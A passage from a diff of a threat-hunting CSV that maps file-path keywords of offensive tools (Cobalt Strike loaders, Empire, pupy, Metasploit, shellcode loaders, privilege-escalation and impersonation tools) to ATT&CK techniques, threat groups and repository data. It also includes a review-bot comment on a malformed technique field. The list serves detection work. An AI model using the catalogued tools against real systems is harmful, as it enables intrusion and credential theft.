It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C8","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" 
+"*/interactive_shell.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" 
+"*/interactsh/*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C5","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" 
+"*/interactsh-client*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C6","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" 
+"*/interactsh-collaborator*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C15","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" 
+"*/interactsh-server*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C8","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z"
 "*/internal/C2/*.go*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z" 
-"*/internal/pipe/pipe.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" 
+"*/internal/pipe/pipe.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z"
 "*/Internals/Coff.cs*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z"
 "*/Inveigh.git*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & 
Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z"
 "*/Inveigh.txt*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z"
 "*/Invoke-Bof/*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 
- T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z"
 "*/Invoke-HostEnum.ps1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" 
-"*/Invoke-RunAs.ps1*","offensive_tool_keyword","empire","Empire scripts 
paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1084","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
+"*/Invoke-RunAs.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1084","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
 "*/Invoke-SMBRemoting.git*","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" 
-"*/ip_spoof.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" 
+"*/IOXIDResolver.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" 
+"*/ip_spoof.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*/IPayloadService.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
 "*/ip-forwarding.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
-"*/IPfuscation.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" 
-"*/IPfuscation.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" 
+"*/IPfuscation.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" 
+"*/IPfuscation.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
 "*/ip-geolocation-geoplugin.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/ip-geolocation-ipinfodb.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/ip-geolocation-map-bing.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -4051,7 +4073,7 @@ "*/ip-geolocation-maxmind.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ip-https-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ipidseq.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/ipmi_passwords.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/ipmi_passwords.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/ipmi-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ipmi-cipher-zero.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ipmi-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
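Review bot: The techniques column on the rewritten `*/ipmi_passwords.txt*` metasploit row still reads `T1204 -T1210`, with no space after the hyphen, while every other ID in that field is joined by ` - `. A consumer that splits the column on ` - ` would get the single token `T1204 -T1210` and lose both technique mappings for any alert raised from this keyword. Since the row is already being replaced for the star, fork and updated-at values, the field could be normalised to `T1204 - T1210` in the same change. The `*/juicypotato*` metasploit row in the `@@ -4081,17 +4103,17 @@` hunk carries the same string.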
@@ -4063,7 +4085,7 @@ "*/irc-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/irc-sasl-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/irc-unrealircd-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/irs.exe*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","1","N/A","N/A","1","77","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*/irs.exe*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and 
is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","1","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "*/iscsi-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/iscsi-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/isns-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -4072,7 +4094,7 @@ "*/jaff.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/jas502n/CVE-2020-5902*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation 